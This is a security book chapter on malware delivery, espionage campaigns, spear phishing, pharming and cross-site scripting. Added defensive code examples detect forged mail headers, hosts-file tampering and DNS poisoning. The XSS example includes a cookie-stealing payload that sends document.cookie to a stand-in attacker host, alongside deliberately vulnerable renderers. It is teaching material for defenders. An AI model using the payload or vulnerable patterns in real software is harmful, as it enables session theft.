Malware Delivery Networks

Dr. Mohit Bansal
Published Date: 26-10-2017
Malware and Malware Delivery Networks

Firewalls have evolved over the years and have been effective in defending against threats that attempt to infiltrate through open service ports from outside a protected infrastructure. The ubiquitous presence of Network Address Translators (NAT) at the ingress points makes it nearly impossible to obtain any meaningful results when host scanning from outside the perimeter of an organization. Although distributed denial of service (DDoS) attacks are still as prevalent today as they were a decade ago, modern variations of traditional brute-force attacks against an infrastructure bring temporary network outages that can be remediated quickly. The existing defensive solutions can also be fortified to recognize these attacks easily, thus becoming capable of fending off similar assaults in the future. More importantly, these attacks inflict limited negative economic impact on an organization. Contemporary security attacks begin with an internal security breach, which results when an internal user is lured into creating outbound connections and reaching malware delivery networks where all kinds of malicious executables such as keyloggers, Trojans, rootkits, and ransomware are hosted for download. The security compromise is now coming from the inside. Hackers, black hats, threat actors—no matter what we call them, these individuals are intelligent, inventive, and capable of creating ingenious exploits. They are motivated by money or driven by political beliefs. Those who are sponsored by governments have inexhaustible resources at their disposal, making them formidable adversaries.
Instead of focusing on host-based solutions such as virus identification, memory forensics, malware executable analysis, and rootkit fundamentals, in this book we choose to focus on subjects that are relevant to the key common operations carried out by the majority of exploits after a successful infiltration, namely, communication with the command and control (C2) center (or “phone home”) and the exfiltration of valuable data.

Cyber Warfare and Targeted Attacks

Modern-day attacks are stealthy and target individuals as well as organizations for maximum economic gain. The Internet, and especially Web 2.0, has facilitated the rapid growth of an illicit shadow economy with hundreds of millions if not billions of dollars in exchange. Modern attacks on organizations have caused tremendous financial damage with far-reaching impacts beyond the victimized institutions. Classified materials that are crucial to national security have been compromised in cyber-attacks. Cyber warfare launched against countries can bring devastation that may be described and measured only in war terminology.

Espionage and Sabotage in Cyberspace

Moonlight Maze was a two-year-long cyber espionage operation carried out by a foreign country, suspected to be Russia, against the computer systems within the Pentagon, NASA, the Department of Energy, and various leading U.S. research institutions and universities between 1998 and 2000. Moonlight Maze stole a large volume of information regarding U.S. military installations and military hardware blueprints. Titan Rain was the FBI designation for cyber-attacks that were uncovered by an employee at Sandia National Laboratories in 2004. The infiltration carried out by the attackers targeted highly sensitive computer systems within Lockheed Martin and Sandia National Laboratories, along with possible targets such as NASA and other defense contractors.
It was estimated to have been active for over three years and was believed to be sponsored by the Chinese government. Titan Rain was one of the most damaging cyber espionage attacks undertaken to steal military intelligence and classified data. Titan Rain was based on advanced persistent threats. Advanced persistent threats, or APTs, are sophisticated cyber attacks that are extremely covert in nature and developed by highly skilled personnel who may be subject experts with a full spectrum of intelligence-gathering and cyber penetration tools at their disposal. An APT avoids detection by siphoning data gradually over an extended period of time. APTs are discussed further in Chapter 8.

Three years after Titan Rain, a second major cyber assault on an independent country became part of cyber warfare history. The cyberspace incursion into Estonia was allegedly funded and managed by the Russian government; it paralyzed the Estonian information infrastructures covering government ministries, the financial sector, and media publications and broadcasters. No sabotage campaign in the cyber war theater has played out as significantly as the Stuxnet attack on the Iranian nuclear fuel enrichment plant at Natanz. Stuxnet malware was discovered in 2010 and was purportedly jointly developed by the United States National Security Agency (NSA), the CIA, and the Israeli intelligence service to sabotage and prevent the progress of the Iranian nuclear fuel enrichment program. The development of Stuxnet spanned two U.S. presidential administrations. Stuxnet was designed to reprogram the programmable logic controllers (PLCs) that are common components in industrial control systems. In fact, Stuxnet contained the first known PLC rootkit to date.
Stuxnet comprises zero-day exploits and a Windows rootkit, as well as techniques for evading behavior-based analysis by antivirus engines and for performing advanced process injection. It can propagate through a network or through removable drives. A zero-day exploit is an attack on a new vulnerability that is known only to the attacker. Stuxnet breaks the centrifuge by altering the motor speed in a meticulous fashion to avoid detection: it increases the centrifuge speed for 15 minutes, then resumes normal operation, hibernates for 27 days, then lowers the centrifuge speed for 50 minutes before returning control; it then repeats this sequence after hibernating for another 27 days. During each attack sequence, the Stuxnet malware disables the relevant warning and safety controls so as to prevent the system from alerting the operators during the speed change. Stuxnet damaged approximately 1,000 IR-1 type centrifuges, representing roughly 10 percent of the installation during the plant’s peak operation. Stuxnet demonstrated that industrial sabotage can cause critical infrastructure failure, resulting in national emergencies. Stuxnet offered strong evidence that its creators had full access to the relevant industrial control systems and the centrifuge in order to develop and qualify the code. Only a state-sponsored organization could have facilitated such an operation. In 2012, Flame, also known as Skywiper, was uncovered by multiple organizations and was reported as the most sophisticated malware ever encountered; it was expected to take years to unravel. Similar to Stuxnet, Flame appeared to be another joint effort between the United States and Israel that was five years in the making and served as a cyber espionage weapon to gather and exfiltrate intelligence from multiple targets inside Iran.
In 2013, Operation Hangover was exposed as a series of attacks that originated from India and that scoured entities in Pakistan to steal information of importance to India’s national interests. Operation Hangover is another example of APT attacks, and although it ultimately failed to achieve its objectives, it was in operation for over two years before being exposed to the public. These momentous state-sponsored cyber-attack events have forever changed and solidified the significance of cyberspace to the status of the “fifth domain” of war, a new addition to the domains of land, sea, air, and space. The concept of cyber warfare has been transformed from abstract theorizing into formalized doctrines in preparation for actual deployment in military combat theaters. Information systems are treated as military assets that must be defended against enemy attacks, utilized to gather foreign intelligence, and deployed in offensive attacks against adversaries. Weaponized malware is now part of the offensive capabilities in military arsenals because cyber warfare can inflict physical damage on targets comparable to conventional weapons. Cyber warfare can be launched against both military and civilian targets. Critical infrastructures such as smart power grids, nuclear power plants, water treatment systems, air traffic management and control systems, oil and gas pipelines, food and beverage supply chain management systems, and financial trading systems are all connected online and accessible through the network, making them desirable targets. Sabotaging these critical infrastructures can have detrimental effects, causing economic collapse of the financial system and massive loss of life and creating widespread panic and chaos across the country under assault.
Cyber warfare can be launched from thousands of miles away, without a physical presence, and active military field equipment such as tanks, combat aircraft, and missile systems are all subject to interference and destruction.

Industrial Espionage

A dramatic increase in industrial espionage is evident in many targeted attacks in recent years, with examples illuminating the fact that impenetrable security is nonexistent and insidious APTs constitute a grievous threat to any organization. A targeted attack implies there is a specific target that possesses data desired by the attackers, who will persist in their attacks until they have acquired the objective. Therefore, such a potential target must concentrate on continuous attack detection and eradication solutions to fend off APTs and adopt the mentality that attack is constant and may already have succeeded, instead of focusing only on attack prevention.

Operation Aurora

In January 2010, Google publicly disclosed that its operation in China was subjected to an APT attack. Operation Aurora was a targeted attack on Google China that was carried out by an organization called the Elderwood Group, based in Beijing. It was largely believed the attack began when targeted Google employees received an e-mail or an instant message forged to appear as if it came from a trusted source. In one case, the e-mail contained a link. The link led the employee to a website in Taiwan, and this website hosted malicious JavaScript. The employee’s Windows Internet Explorer browser then automatically downloaded this JavaScript, which ran and exploited a zero-day vulnerability in the browser. Once the JavaScript executed, it downloaded another malicious payload that was disguised as an image file; this payload then created a backdoor and connected the malware to its C2 server.
At this point the attackers had gained full access to Google’s internal systems. In another case, the e-mail came with a malicious PDF file attachment that exploited a vulnerability in the Adobe Reader program. Once opened, the embedded malware inside the PDF file allowed the attacker to remotely control the system for further penetration. Regardless of the infiltration method, the malware went after source code repositories and tried to access Google e-mail accounts of Chinese political activists. More than 30 high-profile technology and defense companies were targets of the same espionage campaign. State sponsorship was evident in the sophisticated nature of the malware and the orchestrated manner of the attacks. One disturbing fact about Operation Aurora is that, until Google discovered the attack in December 2009, many, if not all, of the victimized corporations were completely unaware that they were being infiltrated and that their confidential intellectual property was being exfiltrated by the attackers. Microsoft had known about the zero-day vulnerability that allowed the attackers to perform remote code execution since September 2009. The patch to fix that Internet Explorer browser bug was scheduled for release in February 2010. Adobe had known about its vulnerability in December 2009, and the bug was not fixed until January 2010, after the Google disclosure. All users of these software programs were exposed to potential attacks while the vendors were working on the fix. In the meantime, the black hats were hard at work trying to maximize exploitation of these vulnerabilities. A crucial question for the security industry to address is what the general public can do to protect itself or to alleviate the threats during the vulnerable window before a solution becomes available.
Since the attackers gained access to the source code repositories, Operation Aurora unveiled a frightening new threat: after stealing the source code, the attackers could have modified it by implementing a new exploit or backdoor to be leveraged in the future against the entire user base of the product built from that source code tree. The code modification could be committed into the original source tree either by masquerading as a legitimate user or by exploiting software bugs that may be present in the underlying source code control systems. The stolen source code will surely be subjected to elaborate vulnerability analysis for creating future exploits. In Operation Aurora, the multi-layer security defense failed: the victims’ anti-spam defenses failed to catch the malicious e-mails; their web filtering solution permitted users to connect to the websites that were hosting the exploits; their antivirus engines did not detect the malware download, possibly due to the zero-day nature of the exploits; their IDS and IPS systems failed to recognize any abnormal patterns during the intrusion; and their DLP systems did not block any data exfiltration.

Watering Hole Attack

We have witnessed in the animal kingdom the dramatic scene of a predator chasing down its prey, twirling with high velocity, and pursuing it with immense concentration while the prey foils the hunter with its mighty sprints. The intensity of the prey’s struggle to survive is unimaginable, with death only a few feet away. Sometimes the prey escapes and the hunter limps away, salivating in discouragement. Then there is another hunting approach often seen in the Serengeti, where the predator lurks by a watering hole, patiently waiting for its prey to approach the precious pond, and while it drinks avariciously, the predator dashes forward for a surprise ambush.
In cyberspace, attacking individual users requires the black hats to penetrate the first layer of defense, namely, a fortified firewall, where the attempt can be detected quickly. The watering hole attack is a type of targeted attack that, instead of focusing on an individual, is aimed at a specific group based on the group’s interests and behavior. In August 2014, a watering hole malware campaign was launched on the website of a software company that produces simulation and systems engineering software for various industries. The website was known to be frequented by engineers who worked in the automotive, aerospace, and manufacturing industries. The attackers planted a Microsoft Internet Explorer zero-day exploit into the compromised website. This exploit leveraged an out-of-bounds memory vulnerability to perform remote code injection and execution of multi-stage shellcode through the visitor’s Internet Explorer browser. The exploit performed reconnaissance operations: it probed for various pieces of information on the visitor, logged the visitor’s keystrokes, and encrypted and then transmitted the collected data to its C2 server. This exploit is unique in that it performs code injection without committing a copy of itself to disk. This behavior may be an indication that the attackers had high confidence in the exploit’s ability to infect the visitors on each of their visits. We can only speculate that the intention of the attackers was to harvest potential visitor information, correlate the user behavior according to what they entered, and then subsequently launch targeted attacks against the visitor or the visitor’s employer to gain industrial secrets. Malware exploits typically consist of two components: the decryption module and the encrypted code payload, as illustrated in Figure 4-1. Shellcode is a small piece of code that is the payload delivered by an exploit.
The decryption module runs first to transform the payload into the shellcode by either decryption or some type of de-obfuscation algorithm (➁). Control is then transferred to the newly formed shellcode, where execution resumes (➂). The shellcode begins its subversion operations by spawning a system command interpreter, commonly known as a command shell (hence its name); then from within this command shell, it performs code injection and execution to methodically take control and commandeer the system. The shellcode is written as position-independent code, meaning the shellcode can be loaded into any memory location for execution.

Figure 4-1: Shellcode. (① The exploit transfers control to the decryption/de-obfuscation code and executes it; ② that code decrypts the encrypted/obfuscated payload into the first-stage shellcode; ③ control transfers to the second-stage shellcode, which executes.)

Code injection refers to the mechanism by which malicious software inserts code fragments into memory and then implants control transfer logic to intercept and manipulate the execution flow. Figure 4-2 depicts the concept of a watering hole attack. As shown in Figure 4-2, when a user visits a compromised website (①), the watering hole exploit remotely injects a code payload directly into the Internet Explorer browser’s running process in memory (➁). From there, the first-stage shellcode launches a standard Windows process, called rundll32, which is responsible for loading Windows dynamic link libraries (DLLs) and placing the functions (additional code) implemented by the DLLs into memory (➂). After launching rundll32, the first-stage shellcode injects the second-stage shellcode into the rundll32 process (➃) and then transfers execution control to it (➄). At this point the exploit has essentially fully compromised the system.

Figure 4-2: Watering Hole Attack. (① The visitor’s system visits the breached website, which carries a planted zero-day Internet Explorer exploit; ② remote code injection into the running Internet Explorer process through the zero-day exploit; ③ the first-stage shellcode launches the rundll32 process; ④ it injects the second-stage shellcode into rundll32; ⑤ control transfers to the final stage, which runs.)

Breaching the Trusted Third Party

In February 2013, Bit9 was breached by hackers, and one of its digital code-signing certificates was stolen. Bit9 is best known for its whitelisting solution that certifies known safe applications. Its agent software intercepts and blocks any application that is not in the approved whitelist. Attackers used Bit9’s signing certificate to sign malicious applications that subsequently circumvented Bit9-based defensive solutions. Bit9’s customers discovered the malware and notified Bit9 because the certificate pointed to Bit9 as its owner. The irony was that Bit9 advocated its solution as the industry leader in non-traditional security solutions for enterprises, yet part of Bit9’s network was not protected by its own solutions. Instead of launching direct assaults on the Bit9 security solution, the attackers made a strategic decision to breach the source of the solution, effectively neutralizing the defense system by passing off the attacks as benign using the legitimate credentials of the system creator. There are known cases where certificates issued to hardware manufacturers have been stolen because these manufacturers produced not only the hardware components and modules but also the companion drivers to run in popular operating systems such as Microsoft Windows.
These drivers must be digitally signed with valid certificates before the driver binaries can be certified to run within the Windows kernel at privileged execution levels. Stealing code-signing certificates and then signing malicious code pretending to be system drivers can easily gain user and system acceptance. The Korean gaming industry, especially massively multiplayer online games, has had numerous breach incidents in the past few years. In each publicized case, malware bearing valid game publishers’ digital signatures was installed through the game update process and infected millions of online players. The various malware have stolen subscribers’ account information, seized in-game assets, installed in-game cheats, or pirated game source code.

Casting the Lures

So how is a user led to download a piece of malware and fall victim to its creator? It all begins with a wide variety of lures as colorful as the human imagination, with the majority rooted in social engineering to entice a potential victim. In the majority of attacks, the bait was conveyed through e-mail. Social networks continue to be an effective attack vector. Although we like to avoid making general statements, incidents have proven time and again that most people on social networks tend to be less knowledgeable about computer security. A lot of them are relative newbies when it comes to safe Internet use practices. This population is always connected to the Internet through their smart mobile devices on fast 4G and LTE networks. They have become more impatient due to constant distractions coming from various mobile applications: Twitter, Snapchat, Skype, and text messages. They are constantly multitasking, participating in simultaneous online conversations, and they are much more willing to talk with strangers online. This changing user behavior subjects them to greater exposure to cyber threats and makes them easy prey to online scams and perpetrators.
The explosive growth of a user base that is energized by visual stimulants and always seeking instant gratification propels social networking service providers to deliver more and more cool and easy-to-use features. Security becomes an afterthought, often left out of the application design, and is perceived as a hindrance to maintaining higher growth. The continuous addition of features to the infrastructure of social networks means that the code remains in a state of flux and security analysis is always incomplete. The interminable relationships developed among millions of users within these social networks serve as rapid infection paths with a broad reach.

Spear Phishing

Spear phishing is a black hat e-mail scam technique that—unlike regular phishing, which spams indiscriminately to all potential victims—targets specific individuals or organizations. With a spear phishing campaign against a well-known organization, the black hat first conducts a background investigation of the targeted organization and then forges a spear phishing e-mail directed at specific individuals in that organization. The e-mail header masquerades as if it originated from someone within that company. The e-mail content contains information pertaining to a specific event that is taking place at the company or discusses a subject that is familiar to the potential victim. For example, the e-mail may purport to seek help from the victim in reviewing a customer document, and the hyperlink to the document actually points to an exploit that is hosted on a malicious website. Or the e-mail may come with a malicious executable disguised as a PDF file attachment. In either case, once the victim takes the bait and executes the exploit that is obtained either directly or through a drive-by download, the exploit compromises the victim’s system and takes a foothold in that corporation’s network.
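The forged header that the spear phishing e-mail relies on leaves traces a mail gateway or an analyst can check mechanically. The following is an added example, not code from the book: it parses a message with Python's standard email module and reports an internal-looking From address whose envelope sender, DMARC verdict or Reply-To disagree with it. The internal domain corp.example, the two messages and the Authentication-Results layout are all constructed for the demo.

```python
"""Added example (not from the book): flag the header forgery that spear
phishing relies on.  INTERNAL_DOMAIN, the two messages and the
Authentication-Results layout are constructed for this demo."""
from email import message_from_string
from email.utils import parseaddr

INTERNAL_DOMAIN = "corp.example"  # assumed: the organization's own mail domain


def _domain(address):
    """Return the lower-cased domain part of an address, or '' if none."""
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def sender_findings(raw_message):
    """Return a list of reasons the message's claimed sender is suspect.
    An empty list means the header fields agree with one another."""
    msg = message_from_string(raw_message)
    findings = []

    _display, from_addr = parseaddr(msg.get("From", ""))
    _, return_path = parseaddr(msg.get("Return-Path", ""))
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    auth = msg.get("Authentication-Results", "").lower()

    claims_internal = _domain(from_addr) == INTERNAL_DOMAIN

    # The envelope sender (bounce address) should match an internal From header.
    if claims_internal and return_path and _domain(return_path) != INTERNAL_DOMAIN:
        findings.append(
            f"From claims {INTERNAL_DOMAIN} but envelope sender is {_domain(return_path)}")

    # A genuine internal message should carry a DMARC pass from our own gateway.
    if claims_internal and "dmarc=pass" not in auth:
        findings.append("internal From address without a DMARC pass")

    # Replies silently steered to a different mailbox are a classic lure trait.
    if reply_to and reply_to.lower() != from_addr.lower():
        findings.append(f"Reply-To {reply_to} differs from From {from_addr}")

    return findings


# Constructed lure: forged internal sender, lookalike Reply-To, DMARC failure.
LURE = """Return-Path: <bounce@mail-relay.example>
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=mail-relay.example; dmarc=fail header.from=corp.example
From: "Dana Supervisor" <dana.supervisor@corp.example>
Reply-To: <dana.supervisor@corp-example.net>
To: alice@corp.example
Subject: please help validate customer contact info

Hi Alice, could you review Customer Bob's contact information at the link?
"""

# Constructed legitimate internal message for comparison.
GENUINE = """Return-Path: <dana.supervisor@corp.example>
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=corp.example; dmarc=pass header.from=corp.example
From: "Dana Supervisor" <dana.supervisor@corp.example>
To: alice@corp.example
Subject: weekly numbers

Attached as discussed.
"""

if __name__ == "__main__":
    for label, raw in (("lure", LURE), ("genuine", GENUINE)):
        print(label, sender_findings(raw) or "no findings")
```

The three checks are deliberately independent: a single mismatch is a reason to look closer, and a message that trips all three, as the constructed lure does, is the pattern the section describes. The DMARC check only means something when the gateway that writes Authentication-Results is trusted and the header cannot be injected from outside.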
Spear phishing owes its effectiveness to a deceptive social engineering tactic that breaks down the victim’s suspicions because the e-mail appears to come from a credible source, so the anecdotal warning “don’t take candy from a stranger” does not seem to apply.

Pharming

Pharming refers to an attack that leads visitors away from a legitimate website and redirects them to a forged site. The fake site is under black hat control and resembles the original legitimate site in almost every way to deceive the visitor. This forgery, when done successfully, persuades the visitor to think he has reached the right site (for example, a banking site), thus inducing the visitor to enter his user credentials to sign in to his account. After acquiring the user credentials, a typical action performed by the pharming code is to forward these credentials onward to the real site, essentially acting as a proxy without the user noticing. The web browser must issue a DNS query to resolve the site’s IP address before making the connection. As such, one type of pharming attack can be accomplished by exploiting DNS vulnerabilities so that the IP address returned from the DNS query is replaced by one that points to the fake site. Examples of DNS vulnerability exploitation include DNS hijacking, domain hijacking, DNS cache poisoning, and DNS spoofing. There are different methods of DNS hijacking. In one method the system configuration is manipulated by malicious code that changes the DNS server to a rogue DNS server under black hat control. The rogue DNS server always returns IP addresses that connect to websites masquerading as the respective legitimate ones. Similarly, the malicious code can change the local DNS configuration file, typically called the hosts file, which directly maps a DNS name to an IP address.
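Both DNS hijacking methods just described leave host-side evidence: a hosts-file line that pins a well-known name to a foreign address, or a resolver setting that no longer matches what the organization hands out. The following is an added example, not code from the book, of how an endpoint check can surface both. The hosts-file content, the monitored domain names and the expected resolver addresses are constructed for the demo (RFC 5737 documentation ranges).

```python
"""Added example (not from the book): surface hosts-file and resolver
tampering of the kind used for pharming.  MONITORED_DOMAINS,
EXPECTED_RESOLVERS and the sample hosts content are constructed."""
import ipaddress

# Names whose local override would be a pharming red flag (assumed list).
MONITORED_DOMAINS = {"bank.example", "www.bank.example", "login.example"}

# Resolvers the organization actually pushes via DHCP (assumed values).
EXPECTED_RESOLVERS = {"192.0.2.53", "192.0.2.54"}


def parse_hosts(text):
    """Yield (ip, hostname) pairs from hosts-file text, skipping comments
    and lines whose first field is not a valid IP address."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue
        for name in parts[1:]:
            yield str(ip), name.lower()


def find_hosts_overrides(text):
    """Return (name, ip) for monitored names the hosts file pins to a
    non-loopback address; a pharming entry looks exactly like this."""
    hits = []
    for ip, name in parse_hosts(text):
        if name in MONITORED_DOMAINS and not ipaddress.ip_address(ip).is_loopback:
            hits.append((name, ip))
    return hits


def find_rogue_resolvers(configured):
    """Return configured resolver addresses that are not on the expected list."""
    return sorted(set(configured) - EXPECTED_RESOLVERS)


# Constructed hosts file: one benign ad-blocking entry and one injected entry.
SAMPLE_HOSTS = """\
# constructed sample hosts file
127.0.0.1   localhost
::1         localhost
198.51.100.7  www.bank.example bank.example   # injected by malware
127.0.0.1   adserver.example
"""

# Constructed resolver list as read from the host's network configuration.
SAMPLE_RESOLVERS = ["192.0.2.53", "203.0.113.9"]

if __name__ == "__main__":
    for name, ip in find_hosts_overrides(SAMPLE_HOSTS):
        print(f"hosts override: {name} -> {ip}")
    for resolver in find_rogue_resolvers(SAMPLE_RESOLVERS):
        print(f"unexpected resolver: {resolver}")
```

Loopback mappings are tolerated on purpose, since pinning an unwanted name to 127.0.0.1 is a common, legitimate use of the hosts file; what matters for pharming is a monitored name pointing at a routable address the organization did not choose.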
Domain hijacking occurs when the owner of an established domain is changed to a different registrant without the knowledge of the original owner. Because a registered domain name has an expiration date, this change can occur due to a lapse in renewal by the original owner, resulting in the domain name being purchased by someone else. Another tactic is impersonation, possibly by means of identity theft and social engineering, to modify the domain ownership. Related to domain hijacking, there is an attack vector where the black hat registers multiple domain names, each being one possible misspelling of the targeted domain name. A visitor is redirected to a fake site when they misspell the domain name as one that has a valid registration with the black hat as the owner. In DNS cache poisoning, a compromised system inside a managed network is induced by the attacker to query a domain name that is under the attacker’s control. The attacker’s domain name is resolved by a rogue DNS server that acts as the authoritative name server for that domain name. When the rogue DNS server returns the query result, it includes response entries for the domains the attacker wants to hijack. Obviously, the IP addresses associated with these legitimate domain names link to forged websites. Once the DNS server that resides in the managed network receives these DNS responses, it will cache these entries. Future DNS responses that contain valid entries for those legitimate domain names will not be accepted until the cached fake entries have expired. Similar to DNS cache poisoning, in a DNS spoofing attack the attacker leverages a compromised system to transmit specially crafted DNS responses for the domain names to be hijacked. The goal is to insert a fake entry into the DNS server cache so that the valid entry is rejected. An attacker can launch a pharming attack through a phishing e-mail.
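The cache-poisoning scenario above works only if the internal resolver caches every record the rogue server hands back. The standard countermeasure is the bailiwick rule: a server answering for one zone is trusted only for names inside that zone, and records for anything else are discarded. The following is an added example, not code from the book, that applies that rule to a constructed response; the zone names, addresses and record tuples are invented for the demo.

```python
"""Added example (not from the book): the bailiwick rule a caching resolver
applies to the records in a response.  Records whose owner name lies outside
the zone the queried server is authoritative for are dropped instead of cached,
which defeats the poisoning scenario above.  All names, addresses and records
below are constructed."""


def in_bailiwick(name, zone):
    """True if `name` equals `zone` or lies beneath it.  The comparison is
    label-boundary aware, so 'evilbank.example' is not inside 'bank.example'."""
    name = name.lower().rstrip(".")
    zone = zone.lower().rstrip(".")
    return name == zone or name.endswith("." + zone)


def filter_response(server_zone, records):
    """Split a response into records safe to cache and records to reject.

    `records` is a list of (owner_name, rtype, rdata) tuples.  The resolver
    trusts the answering server only for `server_zone`, the zone it asked
    about, so anything else in the answer, authority or additional sections
    is ignored regardless of how plausible it looks."""
    accepted, rejected = [], []
    for rec in records:
        target = accepted if in_bailiwick(rec[0], server_zone) else rejected
        target.append(rec)
    return accepted, rejected


# Constructed reply from a rogue server that is genuinely authoritative for
# attacker.example but tries to smuggle in records for bank.example.
ROGUE_RESPONSE = [
    ("attacker.example", "A", "203.0.113.10"),
    ("www.attacker.example", "A", "203.0.113.11"),
    ("bank.example", "NS", "ns.attacker.example"),   # out of bailiwick
    ("ns.attacker.example", "A", "203.0.113.13"),    # glue inside the zone: fine
    ("www.bank.example", "A", "203.0.113.12"),       # out of bailiwick
]

if __name__ == "__main__":
    ok, bad = filter_response("attacker.example", ROGUE_RESPONSE)
    for rec in ok:
        print("cache  ", rec)
    for rec in bad:
        print("reject ", rec)
```

The bailiwick check addresses the poisoning-by-extra-records case. For the spoofing variant, where forged replies race the legitimate answer, resolvers additionally randomize the query transaction ID and source port so that a blind forgery is unlikely to match, and DNSSEC validation lets the resolver reject a response whose signature does not verify.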
For example, the attacker can craft and forge an e-mail that appears to come from a well-known bank, asking the recipient to log into the banking site to validate their address information. If the recipient is an unsuspecting user who promptly clicks the link embedded in the e-mail, that user is led to a landing page that appears to be exactly the same as the banking site, but underneath it is a fake site whose only purpose is to harvest user credentials.

Cross-Site Scripting

Spear phishing is an essential component of a cross-site scripting (XSS) attack. An XSS attack is the exploitation of a type of vulnerability that has been discovered in web-based applications. This vulnerability enables an attacker to inject scripts that will execute on the client side to hijack an active client session using stolen session credentials. The XSS attack circumvents the basic same-origin web application security policy. The same-origin policy restricts the browser such that content received from one website is not allowed to read or write content received from a different site. There are various types of XSS attacks: reflected (or non-persistent) attacks, persistent (or stored) attacks, and Document Object Model (DOM) vulnerability-based attacks. A reflected XSS attack describes the scenario where a web-based application extracts and includes a portion of the client’s input verbatim in its response to the client. The goal of the attacker is to steal the session token, which may be in the form of a browser cookie, and hijack that client session. The session cookie is issued by the web application server; therefore, any dynamic JavaScript code that wants to retrieve the session cookie must come from that same web server. So the attacker attempts to exploit the XSS vulnerability to obtain the session cookie.
The assumption is that the attacker has deep knowledge of the web application under attack. It is common practice for the black hat to first map out as much of the web application as possible and then probe each operation within the application to expose one or more vulnerabilities. The prerequisite for a successful attack is that the attacker has discovered an application behavior, called an XSS vulnerability, where an operation is known to take a portion of the user input and include that input unmodified in the result of that operation. This discovery enables the attacker to create special input that targets the known XSS vulnerability. This attack scenario is depicted in Figure 4-3.

Figure 4-3: Cross-Site Scripting Attack. (① Black hat probes and discovers XSS vulnerabilities in the CRM; ② the user’s browser is connected and signed on to the CRM web application; ③ spear phishing e-mail carrying a crafted CRM request with embedded JavaScript; ④ user takes the bait and sends the request; ⑤ CRM app responds with the same embedded JavaScript; ⑥ JavaScript executes in the browser and retrieves the session cookie; ⑦ browser sends the session cookie to the attacker; ⑧ attacker hijacks the user session.)

In this example, a black hat has discovered vulnerabilities in a customer relationship management (CRM) application, which may be exploited to launch XSS attacks against its users (①). Now a user has established a connection to this CRM application, and the user has successfully logged into his or her account (➁). For example, the user may be a salesperson who needs to be logged into the CRM throughout the entire workday. So the attacker meticulously crafts a request targeting that CRM system and embeds in that application request a piece of obfuscated JavaScript code. The function to be performed by the JavaScript code is to retrieve the session cookie and send it to a designated web location.
Then the attacker uses spear phishing to send the user an e‐mail with the subject “please help validate customer contact info” (③). The attacker forges an HTML e‐mail to appear as if it were sent from the user's supervisor. In this bogus e‐mail is the customized request in hyperlink form, with a link title that reads “Customer Bob's contact information”. The user takes the bait and clicks the hyperlink, which sends the specially crafted request to the web application (④). Because of the XSS vulnerability, the CRM system returns that exact JavaScript back to the user (⑤). This time the user's browser executes the JavaScript (⑥) and transmits the session cookie to the attacker (⑦). Now the attacker can easily hijack and take over the user session (⑧).

The web has evolved from a repository of static content to an interactive web where participants of the so‐called Web 2.0 can browse static web pages as well as publish dynamic content. For example, anyone can visit a social forum and view ongoing discussions in real time. In many cases the forum allows both subscribers and anonymous visitors to contribute to that discussion by posting their comments and opinions. This kind of interactive forum facilitates a persistent, or stored, XSS attack. With a stored XSS attack, an attacker posts content containing crafted JavaScript that will execute in the browser of whoever reads that posting. As in a reflected XSS attack, the malicious code executes in the visitor's browser and sends the visitor's session cookie to the attacker. If the visitor is in fact a registered forum member, then this stored XSS attack will eventually let the attacker compromise that user's account. A stored XSS attack is more damaging than a reflected XSS attack: a reflected XSS attack targets a single victim per lure, whereas a stored XSS attack targets anyone who views the maliciously crafted content.
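The three mechanisms the chapter describes (reflected, stored, and the DOM‐based variant covered next) reduce to the same defect: untrusted text reaches an HTML sink without encoding. The following is an added example, not code from the book or from any real CRM or forum product; the search handler, the forum store, the greeting widget, the fake DOM element and the attacker hostname are all hypothetical stand‐ins. It shows each vulnerable pattern beside its hardened form, with the cookie‐stealing payload the chapter describes, and the server‐side cookie flag that blunts that particular theft.

```javascript
// Added example (not from the book): reflected, stored and DOM-based XSS,
// each as the vulnerable pattern beside the hardened one. The CRM search
// page, the forum and the greeting widget are hypothetical stand-ins for
// the applications described in the text.

// The attacker's aim in the chapter: read the session cookie and ship it to a
// collection point. attacker.example is a placeholder hostname.
const COOKIE_STEALER =
  '<img src=x onerror="new Image().src=\'https://attacker.example/c?\'+document.cookie">';

// Minimal entity encoding for text placed between tags. Attribute, URL and
// JavaScript contexts need their own encoders; this one is not enough there.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// --- Reflected XSS: the CRM search handler echoes the query back verbatim.
function renderSearchVulnerable(q) {
  return `<h1>Results for ${q}</h1>`;
}
function renderSearchSafe(q) {
  return `<h1>Results for ${escapeHtml(q)}</h1>`;
}

// --- Stored XSS: a forum keeps posts and renders them for every later reader.
const posts = [];
function storePost(text) {
  posts.push(text);
}
function renderForumVulnerable() {
  return posts.map((p) => `<p>${p}</p>`).join('\n');
}
function renderForumSafe() {
  return posts.map((p) => `<p>${escapeHtml(p)}</p>`).join('\n');
}

// --- DOM-based XSS: client-side code reads the URL fragment and writes it
// into the page. `el` stands in for a DOM element ({innerHTML, textContent});
// in a browser it would be document.getElementById(...). The part after '#'
// is never sent to the server, so no server-side filter or log sees it.
function greetFromUrlVulnerable(url, el) {
  const name = decodeURIComponent(new URL(url).hash.slice(1));
  el.innerHTML = `Welcome back, ${name}`;      // HTML sink: markup is parsed
}
function greetFromUrlSafe(url, el) {
  const name = decodeURIComponent(new URL(url).hash.slice(1));
  el.textContent = `Welcome back, ${name}`;    // text sink: shown literally
}

// Does rendered markup still carry the payload as a live element with an
// event handler, or only as inert escaped text?
function payloadIsLive(html) {
  return /<img\b[^>]*\bonerror=/i.test(html);
}

// Server-side mitigation for the theft itself: an HttpOnly cookie travels
// with requests but is invisible to document.cookie, so even a successful
// injection cannot read it (it can still act as the user from inside the page).
function sessionCookieHeader(sessionId) {
  return `session=${sessionId}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}
```

Run the vulnerable and safe renderers against `COOKIE_STEALER` and compare: the vulnerable output contains a parseable `<img ... onerror=...>` element, the safe output contains `&lt;img ...` text. The `HttpOnly` flag is the single cheapest change a defender can make against the cookie‐theft step described above, but it does nothing against an injected script that simply issues CRM requests on the victim's behalf; output encoding is still the fix.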
